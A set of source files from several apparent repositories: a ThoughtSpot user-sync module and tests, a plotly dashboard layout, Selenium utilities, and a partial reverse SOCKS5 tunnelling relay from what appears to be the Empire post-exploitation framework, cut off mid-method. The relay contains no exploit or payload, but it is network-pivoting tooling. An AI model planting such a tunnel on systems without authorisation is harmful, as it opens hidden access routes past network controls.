privileges = line[self.group_field_mapping["privileges"]],
group_names = ast.literal_eval(line[self.group_field_mapping["group_names"]]),# assumes valid list format, e.g. ["a", "b", ...]
visibility = line[self.group_field_mapping["visibility"]]
)
#add User to UsersAndGroups object
uag.add_group(g)
firstline = 0
return uag
class UGOracleReader:
"""
Reads users and groups from Oracle.
"""
DEFAULT_USER_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"mail": "Email",
"password": "Password",
"group_names": "Groups",
"group_names2": "Groups2",
"group_names3": "Groups3",
"visibility": "Visibility"
}
DEFAULT_GROUP_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"description": "Description",
"group_names": "Groups",
"group_names2": "Groups2",
"group_names3": "Groups3",
"visibility": "Visibility",
"privileges": "Privileges"
}
def __init__(self,
user_field_mapping=DEFAULT_USER_FIELD_MAPPING,
group_field_mapping=DEFAULT_GROUP_FIELD_MAPPING):
"""
Creates a new Oracle reader.
:param user_field_mapping: The mapping of columns to values for users.
:type user_field_mapping: dict of str:str
:param group_field_mapping: The mapping of columns to values for groups.
:type group_field_mapping: dict of str:str
"""
self.user_field_mapping = copy.copy(user_field_mapping)
self.group_field_mapping = copy.copy(group_field_mapping)
self.validate_fields()
def validate_fields(self):
"""
Verifies that the minimal required field mappings exist. Raises a ValueError if not.
:return: None
:raises: ValueError
"""
if "name" not in self.user_field_mapping.keys():
raise ValueError("Missing mapping for 'name'.")
if "name" not in self.group_field_mapping.keys():
raise ValueError("Missing mapping for 'name'.")
def read_from_oracle(self, oracle_u_pw_dsn, oracle_config, users_sql, groups_sql, archive_dir, current_timestamp):
"""
Loads users and groups from Oracle. If the groups_sql is not provided, the groups will be created from the
user file with just the names.
:param users_sql: Path to the user query SQL file.
:type users_sql: str
:param groups_sql: Path to the group query SQL file.
:type groups_sql: str
:return: Users and groups object.
:rtype: UsersAndGroups
"""
if not archive_dir:
archive_dir = './archive/'
try:
os.makedirs(archive_dir)
except FileExistsError:
if os.path.isfile(archive_dir):
logging.warn("There is already a file called '{0}'. Query result CSV archives will instead be saved to '.' (the current working directory).").format(archive_dir)
archive_dir = './'
# check archive_dir (for achiving query results)
if not archive_dir.endswith('/'):
archive_dir += '/'
# initialize UsersAndGroups object to add User and Group objects to
uag = UsersAndGroups()
# Read in Oracle connection config file, SQL file(s), run query, do minimal check on result, and create User.
# Saving the column name that "name" maps to since I use it again later
user_name_column_name = self.user_field_mapping["name"]
if oracle_u_pw_dsn:
oracle_u, oracle_pw, oracle_dsn = oracle_u_pw_dsn.split(',')
try:
connection = cx_Oracle.connect(oracle_u, oracle_pw, oracle_dsn) # If this causes error, try setting $TNS_ADMIN to the dir containing tnsnames.ora
except Exception as e:
write_outcome_file(msg = "Failure. TS sync failed.\nCould not connect to Oracle DB.", successful=False)
logging.info("Wrote failure text file")
raise e
else:
with open(oracle_config) as json_file:
connect_data = json.load(json_file)
user = connect_data["user"]
password = connect_data["password"]
dsn_dict = connect_data["dsn"]
host = dsn_dict["host"]
port = dsn_dict["port"]
service_name = dsn_dict["service_name"]
dsn = cx_Oracle.makedsn(host=host, port=port, service_name=service_name)
# Connect
connection = cx_Oracle.connect(user=user, password=password, dsn=dsn)
# Query
cursor = connection.cursor()
cursor.execute("SET TRANSACTION READ ONLY")
if users_sql:
with open(users_sql) as sql_f:
sql = sql_f.read()
cursor.execute(sql)
column_names = [col[0] for col in cursor.description]
if user_name_column_name not in column_names:
raise ValueError("No column called '%s' in query results" % user_name_column_name)
query_results = cursor.fetchall() # a list
# Create Users and also add to archive file
user_archive_filename = '{0}users_to_sync_from_oracle{1}.csv'.format(archive_dir, current_timestamp)
with open(user_archive_filename, 'w') as user_archive_file:
user_writer = csv.DictWriter(user_archive_file, fieldnames=column_names)
user_writer.writeheader()
for tupl in query_results:
line = {} # TODO maybe change name to line_dict
for i in range(0, len(column_names)):
line.update({column_names[i]: tupl[i]})
user_writer.writerow(line)
groups_field = "[]"
groups2_field = "[]"
groups3_field = "[]"
if self.group_field_mapping["group_names"] in line.keys():
groups_field_val = line[self.group_field_mapping["group_names"]]
if groups_field_val:
groups_field = groups_field_val
else:
logging.warn("\"Groups\" is NULL in query results. Treating as \"[]\".")
if 'group_names2' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names2"] in line.keys():
groups2_field_val = line[self.group_field_mapping["group_names2"]]
if groups2_field_val:
groups2_field = groups2_field_val
else:
logging.warn("\"Groups2\" is NULL in query results. Treating as \"[]\".")
if 'group_names3' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names3"] in line.keys():
groups3_field_val = line[self.group_field_mapping["group_names3"]]
if groups3_field_val:
groups3_field = groups3_field_val
else:
logging.warn("\"Groups3\" is NULL in query results. Treating as \"[]\".")
groups1, groups2, groups3 = [list(),list(),list()]
try:
groups1 = ast.literal_eval(groups_field)
except:
logging.warn("\"Groups\" column could not be evaluated as a Python list; using [].")
groups1 = []
try:
groups2 = ast.literal_eval(groups2_field)
except:
logging.warn("\"Groups2\" column could not be evaluated as a Python list")
try:
groups3 = ast.literal_eval(groups3_field)
except:
logging.warn("\"Groups3\" column could not be evaluated as a Python list")
all_groups_unfiltered = groups1 + groups2 + groups3 # assumes valid list format, e.g. ["a", "b", ...]
# TODO this is an arbirary rule that I shouldn't hard-code in:
# Filter out group names ending in underscore.
all_groups = [x for x in all_groups_unfiltered if not x.endswith('_')]
diff = list(set(all_groups_unfiltered) - set(all_groups))
if len(diff) > 0:
logging.warn("You tried to assign {0} to group(s) whose name ends in '_', which this code prevents: {1}.".format(line[user_name_column_name],str(diff)))
# Note if there are repeats
if len(all_groups) != len(set(all_groups)):
mode = max(set(all_groups), key = all_groups.count)
logging.warn("(Combined) Groups column(s) contains at least 1 repeat (after filtering out bad group names, if any). The main or only offender: {0}. Repeats will be filtered out.".format(mode))
visibility_field = None
if 'visibility' in self.group_field_mapping.keys():
if self.group_field_mapping["visibility"] in line.keys():
visibility_field_val = line[self.group_field_mapping["visibility"]]
if visibility_field_val:
visibility_field = visibility_field_val
else:
#logging.warn("\"Visibility\" is NULL in query results. Treating as None.")
pass
else:
#logging.warn("\"Visibility\" is absent in query results. Treating as None.")
pass
u = User(
name = line[user_name_column_name],
display_name = line[self.user_field_mapping["display_name"]],
mail = line[self.user_field_mapping["mail"]],
password = line[self.user_field_mapping["password"]],
group_names = all_groups,
visibility = visibility_field
)
#add User to UsersAndGroups object
uag.add_user(u)
if groups_sql:
group_name_column_name = self.group_field_mapping["name"]
with open(groups_sql) as sql_f:
sql = sql_f.read()
cursor.execute(sql)
column_names = [col[0] for col in cursor.description]
if group_name_column_name not in column_names:
raise ValueError("No column called '%s' in query results" % group_name_column_name)
query_results = cursor.fetchall() # a list
# Create Users and also add to archive file
group_archive_filename = '{0}groups_to_sync_from_oracle{1}.csv'.format(archive_dir, current_timestamp)
with open(group_archive_filename, 'w') as group_archive_file:
group_writer = csv.DictWriter(group_archive_file, fieldnames=column_names)
group_writer.writeheader()
for tupl in query_results:
line = {} # TODO maybe change name to line_dict
for i in range(0, len(column_names)):
line.update({column_names[i]: tupl[i]})
group_writer.writerow(line)
groups_field = "[]"
groups2_field = "[]"
groups3_field = "[]"
if 'group_names' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names"] in line.keys():
groups_field_val = line[self.group_field_mapping["group_names"]]
if groups_field_val:
groups_field = groups_field_val
else:
logging.warn("\"Groups\" is NULL in query results. Treating as \"[]\".")
if 'group_names2' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names2"] in line.keys():
groups2_field_val = line[self.group_field_mapping["group_names2"]]
if groups2_field_val:
groups2_field = groups2_field_val
else:
logging.warn("\"Groups2\" is NULL in query results. Treating as \"[]\".")
if 'group_names3' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names3"] in line.keys():
groups3_field_val = line[self.group_field_mapping["group_names3"]]
if groups3_field_val:
groups3_field = groups3_field_val
else:
logging.warn("\"Groups3\" is NULL in query results. Treating as \"[]\".")
groups1, groups2, groups3 = ['[]','[]','[]']
try:
groups1 = ast.literal_eval(groups_field)
except:
groups_field_str = str(groups_field)
logging.warn(f"\"Groups\" column could not be evaluated as a Python list: {groups_field_str}")
try:
groups2 = ast.literal_eval(groups2_field)
except:
logging.warn("\"Groups2\" column could not be evaluated as a Python list")
try:
groups3 = ast.literal_eval(groups3_field)
except:
logging.warn("\"Groups3\" column could not be evaluated as a Python list")
all_groups = groups1 + groups2 + groups3 # assumes valid list format, e.g. ["a", "b", ...]
visibility_field = None
if 'visibility' in self.group_field_mapping.keys():
if self.group_field_mapping["visibility"] in line.keys():
visibility_field_val = line[self.group_field_mapping["visibility"]]
if visibility_field_val:
visibility_field = visibility_field_val
else:
#logging.warn("\"Visibility\" is NULL in query results. Treating as None.")
pass
else:
#logging.warn("\"Visibility\" is absent in query results. Treating as None.")
pass
privileges_field = None
if 'privileges' in self.group_field_mapping.keys():
if self.group_field_mapping["privileges"] in line.keys():
privileges_field_val = line[self.group_field_mapping["privileges"]]
if privileges_field_val:
privileges_field = privileges_field_val
else:
#logging.warn("\"Privileges\" is NULL in query results. Treating as None.")
pass
else:
#logging.warn("\"Privileges\" is absent in query results. Treating as None.")
pass
g = Group(
name = line[group_name_column_name],
display_name = line[self.group_field_mapping["display_name"]],
description = line[self.group_field_mapping["description"]],
group_names = all_groups,# assumes valid list format, e.g. ["a", "b", ...]
visibility = visibility_field,
privileges = privileges_field
)
#add User to UsersAndGroups object
uag.add_group(g)
cursor.close()
return uag
```
#### File: tsut/tests/test_all_users_and_groups.py
```python
import unittest
from tsut.model import UsersAndGroups, User, Group
"""
Copyright 2018 ThoughtSpot
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
class TestAllUsersAndGroups(unittest.TestCase):
"""Tests the AllUsersAndGroups class."""
def test_adding_and_removing_users(self):
"""Tests adding and removing users."""
auag = UsersAndGroups()
auag.add_user(User("user1"))
auag.add_user(User("user2"))
self.assertTrue(auag.has_user("user1"))
self.assertFalse(auag.has_user("user6"))
self.assertEqual(auag.number_users(), 2)
auag.remove_user("user1")
self.assertFalse(auag.has_user("user1"))
self.assertEqual(auag.number_users(), 1)
self.assertTrue(auag.has_user("user2"))
u = auag.get_user("user2")
self.assertTrue(u.name, "user2")
self.assertIsNone(auag.get_user("noone"))
def test_duplicate_users(self):
"""Tests adding users with the same name, but duplicate in case."""
auag = UsersAndGroups()
auag.add_user(User("user1"))
with self.assertRaises(Exception):
auag.add_user(User("user1"))
with self.assertRaises(Exception):
auag.add_user(User("User1"))
self.assertEqual(auag.number_users(), 1)
self.assertTrue(auag.has_user("user1"))
self.assertTrue(auag.has_user("User1"))
auag.remove_user("user1")
self.assertFalse(auag.has_user("user1"))
self.assertEqual(auag.number_users(), 0)
def test_adding_and_removing_groups(self):
"""Tests adding and removing groups."""
auag = UsersAndGroups()
auag.add_group(Group("Group1"))
auag.add_group(Group("Group2"))
auag.add_group(Group("Group3"))
self.assertTrue(auag.has_group("Group1"))
self.assertTrue(auag.has_group("Group2"))
self.assertTrue(auag.has_group("Group3"))
self.assertEqual(auag.number_groups(), 3)
auag.remove_group("Group1")
self.assertFalse(auag.has_group("Group1"))
self.assertEqual(auag.number_groups(), 2)
self.assertTrue(auag.has_group("Group2"))
u = auag.get_group("Group2")
self.assertTrue(u.name, "Group2")
self.assertIsNone(auag.get_group("noone"))
# noinspection PyUnresolvedReferences
def test_to_json(self):
"""Tests converting to JSON"""
auag = UsersAndGroups()
auag.add_group(Group("group1"))
auag.add_group(Group("group2", group_names=["group1"]))
auag.add_user(User("user1", group_names=["group1"]))
auag.add_user(User("user2", group_names=["group1", "group2"]))
json_str = auag.to_json()
self.assertTrue(json_str.startswith("[{ "))
self.assertTrue(json_str.endswith("}]"))
self.assertTrue('"name":"user1"' in json_str)
self.assertTrue('"name":"user2"' in json_str)
self.assertTrue('"name":"group1"' in json_str)
self.assertTrue('"name":"group2"' in json_str)
def test_is_valid(self):
"""Tests validating users and groups."""
auag = UsersAndGroups()
auag.add_group(Group("group1"))
auag.add_group(Group("group2", group_names=["group1"]))
auag.add_user(User("user1", mail="<EMAIL>", group_names=["group1"]))
auag.add_user(User("user2", mail="<EMAIL>", group_names=["group1", "group2"]))
results = auag.is_valid()
self.assertTupleEqual((results.result, results.issues), (True, []))
auag.add_user(
User("user3", group_names=["group3"])
) # group3 doesn't exist.
results = auag.is_valid()
self.assertFalse(results.result)
def test_from_json(self):
json_str = """
[
{
"principalTypeEnum": "LOCAL_GROUP",
"name": "test",
"displayName": "Test Group",
"description": "Test group for validation.",
"visibility": "NON_SHARABLE"
},
{
"principalTypeEnum": "LOCAL_USER",
"name": "user_1",
"displayName": "User 1",
"password": "<PASSWORD>",
"mail": "<EMAIL>",
"groupNames": ["test"],
"visibility": "NON_SHARABLE"
}
]
"""
ugs = UsersAndGroups()
ugs.load_from_json(json_str=json_str.replace("\n", ""))
self.assertTrue(ugs.is_valid())
```
#### File: tsut/tests/test_xls_writer.py
```python
import unittest
import os
from tsut.model import UsersAndGroups, User, Group
from tsut.io import UGXLSWriter
"""
Copyright 2018 ThoughtSpot
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
class TestUGXLSWriter(unittest.TestCase):
"""Tests the AllUsersAndGroups class."""
def test_write_to_xls(self):
"""Tests writing users and groups."""
uags = UsersAndGroups()
uags.add_group(
Group(
name="Group 1",
display_name="This is Group 1",
description="A group for testing.",
group_names=[],
)
)
uags.add_group(
Group(
name="Group 2",
display_name="This is Group 2",
description="Another group for testing.",
group_names=["Group 1"],
)
)
uags.add_group(
Group(
name='Group "3"',
display_name='This is Group "3"',
description='Another "group" for testing.',
group_names=["Group 1", "Group 2"],
)
)
uags.add_user(
User(
name="User1",
password="<PASSWORD>",
display_name="User 1",
mail="<EMAIL>",
group_names=["Group 1"],
)
)
uags.add_user(
User(
name="User2",
password="<PASSWORD>",
display_name="User 2",
mail="<EMAIL>",
group_names=["Group 1", "Group 2"],
)
)
# Testing for ability to handle embedded quotes.
uags.add_user(
User(
name='User "3"',
password="<PASSWORD>",
display_name='User "3"',
mail="<EMAIL>",
group_names=['Group "3"'],
)
)
writer = UGXLSWriter()
writer.write(uags, "test_uags")
os.remove("test_uags.xlsx")
``` |
{
"source": "Jim-Shaddix/Neutron-Scattering-Dashboard",
"score": 3
} |
#### File: Jim-Shaddix/Neutron-Scattering-Dashboard/layout.py
```python
import plotly.graph_objects as go
from __init__ import intensity, heatmap_x_ticktext, heatmap_x_tickvals, heatmap_y_ticktext, heatmap_y_tickvals, heatmap_hovertemplate
def xaxis_title(title):
xaxis = go.layout.xaxis.Title(
text=title
)
return xaxis
def yaxis_title(title):
yaxis = go.layout.yaxis.Title(
text=title
)
return yaxis
layout_heatmap = go.Layout(
title=go.layout.Title(text="Intensity (arb. units)", xref="paper", x=0.5),
width=450,
height=350,
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
xaxis=go.layout.XAxis(showgrid=False, zeroline=False,
tickvals=heatmap_x_tickvals,
ticktext=heatmap_x_ticktext,
title=xaxis_title("[1K0] (r.l.u.)")
),
yaxis=go.layout.YAxis(showgrid=False, zeroline=False,
tickvals=heatmap_y_tickvals,
ticktext=heatmap_y_ticktext,
title=yaxis_title("Energy Transfer (meV)")
),
margin=go.layout.Margin(
l=50,
r=0,
b=0,
t=30,
pad=0
)
)
layout_cross = go.Layout(
title=go.layout.Title(text="Cross Section", xref="paper", x=0.5),
width=380,
height=350,
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
xaxis=go.layout.XAxis(
showline=True, linewidth=2, linecolor='black', mirror=True,
showgrid=True, gridwidth=1, gridcolor='LightGrey',
zeroline=True, zerolinewidth=2, zerolinecolor='LightGrey',
title=xaxis_title("X axis")
),
yaxis=go.layout.YAxis(
showline=True, linewidth=2, linecolor='black', mirror=True,
showgrid=True, gridwidth=1, gridcolor='LightGrey',
zeroline=True, zerolinewidth=2, zerolinecolor='LightGrey',
title=yaxis_title("Intensity (arb. units)")
),
margin=go.layout.Margin(
l=50,
r=20,
b=0,
t=30,
pad=0
)
)
# Data for the Heat Map
trace_heatmap = go.Heatmap(
z=intensity,
showscale=True,
colorscale=[
[0, 'rgb(0, 0, 0)'], # black
[0.1, 'rgb(153, 51, 255)'], # purple
[0.2, 'rgb(51, 51, 255)'], # blue
[0.3, 'rgb(51, 153, 255)'], # light blue
[0.4, 'rgb(51, 255, 255)'], # teal
[0.5, 'rgb(51, 255, 153)'], # light green
[0.6, 'rgb(51, 255, 51)'], # green
[0.7, 'rgb(153, 255, 51)'], # yellow green
[0.8, 'rgb(255, 255, 51)'], # yellow
[0.9, 'rgb(255, 153, 51)'], # orange
[1, 'rgb(255, 51, 51)'] # red
],
hovertemplate=heatmap_hovertemplate
)
``` |
{
"source": "Jim-Shaddix/spring-demos",
"score": 3
} |
#### File: lib/util/WebDriverUtil.py
```python
from typing import List
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.chrome.webdriver import WebDriver
from selenium.webdriver.common.by import By
def next_element(driver: WebDriver, elem: WebElement) -> WebElement:
next_sibiling = driver.execute_script("""
return arguments[0].nextElementSibling
""", elem)
return next_sibiling
def css_select(element, css_selector) -> WebElement:
return element.find_element(by=By.CSS_SELECTOR, value=css_selector)
def css_select_all(element, css_selector) -> List[WebElement]:
return element.find_elements(by=By.CSS_SELECTOR, value=css_selector)
```
#### File: whoami/parsing/main.py
```python
import sys
from lib.parser.ResponseCodeParser import ResponseCodeParser
from lib.parser.HeaderParser import HeaderParser
from lib.parser.RequestMethodParser import RequestMethodParser
from lib.config.config import Config
def main():
header_website = sys.argv[0]
response_code_website = sys.argv[1]
request_header_website = sys.argv[2]
web_driver_path = sys.argv[3]
HeaderParser.execute(Config.get_webdriver(header_website, web_driver_path))
ResponseCodeParser.execute(Config.get_webdriver(response_code_website, web_driver_path))
RequestMethodParser.execute(Config.get_webdriver(request_header_website, web_driver_path))
if __name__ == "__main__":
main()
``` |
{
"source": "jimshew/Empire",
"score": 2
} |
#### File: python/management/socks-src.py
```python
from builtins import next
from builtins import hex
from builtins import object
import argparse
import logging
import random
import select
import shlex
import signal
import socket
import ssl
import struct
import sys
MTYPE_NOOP = 0x00 # No-op. Used for keepalive messages
MTYPE_COPEN = 0x01 # Open Channel messages
MTYPE_CCLO = 0x02 # Close Channel messages
MTYPE_CADDR = 0x03 # Channel Address (remote endpoint address info)
MTYPE_DATA = 0x10 # Data messages
def recvall(s, size):
data = ''
while len(data) < size:
d = s.recv(size - len(data))
if not d:
break
data += d
return data
def integer_generator(seed=random.randint(0, 0xffffffff)):
while True:
seed = (seed + 1) % 0xffffffff
yield seed
class Message(object):
""" Container class with (un)serialization methods """
M_HDR_STRUCT = struct.Struct('!BII') # Message Type | Channel ID | Payload Size
def __init__(self, mtype=MTYPE_NOOP, channel=0, size=0):
self.mtype = mtype
self.channel = channel
self.size = size
def __str__(self):
return '<Message type={} channel={}>'.format(self.mtype, self.channel)
@classmethod
def unpack(cls, data):
if len(data) < cls.M_HDR_STRUCT.size:
raise ValueError('Attempting to unpack a Message header from too little data')
return Message(*cls.M_HDR_STRUCT.unpack(data[:cls.M_HDR_STRUCT.size])), data[cls.M_HDR_STRUCT.size:]
def pack(self, data=''):
self.size = len(data)
return self.M_HDR_STRUCT.pack(self.mtype, self.channel, self.size) + data
class Channel(object):
""" Container class with remote socket and channel id """
def __init__(self):
self.socket = None # type: socket.socket
self.channel_id = None
self.remote_peer_addr = None
self.local_peer_addr = None
self.socks_handler = SocksHandler()
self.logger = logging.getLogger(self.__class__.__name__)
def __str__(self):
return '<Channel id={} remote_addr={} local_addr={}>'.format(self.channel_id, self.remote_peer_addr, self.local_peer_addr)
@property
def connected(self):
return isinstance(self.socket, socket.socket)
def fileno(self):
return self.socket.fileno()
def close(self):
self.logger.debug('Closing channel {}'.format(self))
if self.connected:
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
except Exception as e:
self.logger.debug('Unable to close channel: {}'.format(e))
self.socket = None
class Tunnel(object):
""" Container class with connected transport socket, list of Channels, and methods for passing Messages """
def __init__(self, transport_socket):
self.channels = [] # List[Channel]
self.transport_socket = transport_socket # type: socket.socket
self.logger = logging.getLogger(self.__class__.__name__)
def send_message(self, msg, data=''):
self.logger.debug('Sending {}'.format(msg))
try:
self.transport_socket.sendall(msg.pack(data))
except (socket.error, TypeError) as e:
self.logger.critical('Problem sending a message over transport: {}'.format(e))
sys.exit(255)
def recv_message(self):
try:
msg, _ = Message.unpack(recvall(self.transport_socket, Message.M_HDR_STRUCT.size))
except socket.error as e:
self.logger.critical('Problem receiving a message over transport: {}'.format(e))
sys.exit(255)
return msg, recvall(self.transport_socket, msg.size)
def get_channel_by_id(self, channel_id):
for c in self.channels:
if c.channel_id == channel_id:
return c
raise KeyError('Invalid channel number "{}"'.format(channel_id))
def open_channel(self, channel_id, remote=False):
c = Channel()
c.channel_id = channel_id
self.channels.append(c)
if remote:
msg = Message(mtype=MTYPE_COPEN, channel=c.channel_id)
self.send_message(msg)
return c
def close_channel(self, channel_id, remote=False):
for c in self.channels:
if c.channel_id == channel_id:
c.close()
self.channels.remove(c)
self.logger.info('Closed channel: {}'.format(c))
break
if remote:
msg = Message(mtype=MTYPE_CCLO, channel=channel_id)
self.send_message(msg)
return
class SocksHandler(object):
SOCKS5_AUTH_METHODS = {
0x00: 'No Authentication Required',
0x01: 'GSSAPI',
0x02: 'USERNAME/PASSWORD',
0xFF: 'NO ACCEPTABLE METHODS'
}
def __init__(self):
self.auth_handled = False
self.request_handled = False
self.logger = logging.getLogger(self.__class__.__name__)
def handle(self, channel, data):
# SOCKSv5 Auth message
if not self.auth_handled:
data = [ord(x) for x in data]
# Expecting [VERSION | NMETHODS | METHODS] (VERSION must be 0x05)
if len(data) < 2 or data[0] != 0x05 or len(data[2:]) != data[1]:
return struct.pack('BB', 0x05, 0xFF) # No Acceptable Auth Methods
methods = [self.SOCKS5_AUTH_METHODS.get(x, hex(x)) for x in data[2:]]
self.logger.debug('Received SOCKS auth request: {}'.format(', '.join(methods)))
self.auth_handled = True
return struct.pack('BB', 0x05, 0x00) # No Auth Required
elif not self.request_handled:
if len(data) < 4 or ord(data[0]) != 0x05:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
cmd = ord(data[1])
rsv = ord(data[2])
atyp = ord(data[3])
if cmd not in [0x01, 0x02, 0x03]:
return struct.pack('!BBBBIH', 0x05, 0x07, 0x00, 0x01, 0, 0) # Command not supported
if rsv != 0x00:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
if atyp not in [0x01, 0x03, 0x04]:
return struct.pack('!BBBBIH', 0x05, 0x08, 0x00, 0x01, 0, 0) # Address type not supported
if cmd == 0x01: # CONNECT
if atyp == 0x01: # IPv4
if len(data) != 10:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
host = socket.inet_ntop(socket.AF_INET, data[4:8])
port, = struct.unpack('!H', data[-2:])
af = socket.AF_INET
elif atyp == 0x03: # FQDN
size = ord(data[4])
if len(data[5:]) != size + 2:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
host = data[5:5+size]
port, = struct.unpack('!H', data[-2:])
af = socket.AF_INET
atyp = 0x01
elif atyp == 0x04: # IPv6
if len(data) != 22:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
host = socket.inet_ntop(socket.AF_INET6, data[5:21])
port, = struct.unpack('!H', data[-2:])
af = socket.AF_INET6
else:
raise NotImplementedError('Failed to implement handler for atype={}'.format(hex(atyp)))
self.logger.debug('Received SOCKSv5 CONNECT request for {}:{}'.format(host, port))
try:
s = socket.socket(af)
s.settimeout(2)
s.connect((host, port))
except socket.timeout:
return struct.pack('!BBBBIH', 0x05, 0x04, 0x00, 0x01, 0, 0) # host unreachable
except socket.error:
return struct.pack('!BBBBIH', 0x05, 0x05, 0x00, 0x01, 0, 0) # connection refused
except Exception:
return struct.pack('!BBBBIH', 0x05, 0x01, 0x00, 0x01, 0, 0) # General SOCKS failure
s.settimeout(None)
channel.socket = s
peer_host, peer_port = s.getpeername()[:2]
channel.local_peer_addr = '{}[{}]:{}'.format(host, peer_host, port)
local_host, local_port = s.getsockname()[:2]
bind_addr = socket.inet_pton(af, local_host)
bind_port = struct.pack('!H', local_port)
ret = struct.pack('!BBBB', 0x05, 0x00, 0x00, atyp) + bind_addr + bind_port
self.logger.info('Connected {}'.format(channel))
self.request_handled = True
return ret
elif cmd == 0x02: # BIND
raise NotImplementedError('Need to implement BIND command') # TODO
elif cmd == 0x03: # UDP ASSOCIATE
raise NotImplementedError('Need to implement UDP ASSOCIATE command') # TODO
else:
raise NotImplementedError('Failed to implemented handler for cmd={}'.format(hex(cmd)))
class SocksBase(object):
def __init__(self, transport_addr=('', 443), socks_addr=('', 1080), keepalive=None, key=None, cert=None):
self.tunnel = None # type: Tunnel
self.transport_addr = transport_addr
self.socks_addr = socks_addr
self.keepalive = keepalive
self.socks_socket = None # type: socket.socket
self.next_channel_id = integer_generator()
self.key = key
self.cert = cert
self.logger = logging.getLogger(self.__class__.__name__)
def check_socks_protocol(self, c, data):
return False
def monitor_sockets(self):
while True:
# Check tunnel and peer connections
sockets = [x for x in self.tunnel.channels if x.connected] + [self.tunnel.transport_socket]
if self.socks_socket is not None:
sockets.append(self.socks_socket)
try:
r, _, _ = select.select(sockets, [], [], self.keepalive)
except select.error:
continue
if not r:
msg = Message(mtype=MTYPE_NOOP) # timeout, send keepalive
self.tunnel.send_message(msg)
continue
if self.tunnel.transport_socket in r:
try:
msg, data = self.tunnel.recv_message()
except Exception as e:
self.logger.critical('Error receiving messages, exiting')
self.logger.debug('Error message: {}'.format(e))
self.tunnel.transport_socket.close()
return
if msg.mtype == MTYPE_NOOP:
self.logger.debug('Received keepalive message, discarding')
elif msg.mtype == MTYPE_COPEN:
c = self.tunnel.open_channel(msg.channel)
self.logger.debug('Received OpenChannel message, opened channel: {}'.format(c))
elif msg.mtype == MTYPE_CCLO:
try:
c = self.tunnel.get_channel_by_id(msg.channel)
self.tunnel.close_channel(msg.channel)
except KeyError:
pass
else:
self.logger.info('Closed a channel: {}'.format(c))
elif msg.mtype == MTYPE_CADDR:
try:
c = self.tunnel.get_channel_by_id(msg.channel)
except KeyError:
pass
else:
c.remote_peer_addr = data
self.logger.info('Channel connected remotely: {}'.format(c))
elif msg.mtype == MTYPE_DATA:
try:
c = self.tunnel.get_channel_by_id(msg.channel)
except KeyError:
pass
else:
self.logger.debug('Received {} bytes from tunnel for {}'.format(len(data), c))
if not self.check_socks_protocol(c, data):
try:
c.socket.sendall(data)
except:
self.logger.debug('Problem sending data to channel {}'.format(c))
self.tunnel.close_channel(msg.channel, remote=True)
else:
self.logger.warning('Received message of unknown type {}'.format(hex(msg.mtype)))
continue
if self.socks_socket is not None and self.socks_socket in r:
s, addr = self.socks_socket.accept()
addr = '{}:{}'.format(*addr)
c = self.tunnel.open_channel(next(self.next_channel_id), remote=True)
c.local_peer_addr = addr
c.socket = s
self.logger.info('Created new channel: {}'.format(c))
continue
for c in r:
try:
data = c.socket.recv(1024)
except Exception as e:
self.logger.debug('Problem recving from {}: {}'.format(c, e))
self.tunnel.close_channel(c.channel_id, remote=True)
break
if not data:
self.logger.debug('Received EOF from local socket, closing channel')
self.tunnel.close_channel(c.channel_id, remote=True)
msg = Message(mtype=MTYPE_DATA, channel=c.channel_id)
self.tunnel.send_message(msg, data=data)
self.logger.debug('Sent {} bytes over tunnel: {}'.format(len(data), msg))
def run(self):
raise NotImplementedError('Subclasses should implement the run() method')
class SocksRelay(SocksBase):
def check_socks_protocol(self, c, data):
if not c.socks_handler.auth_handled:
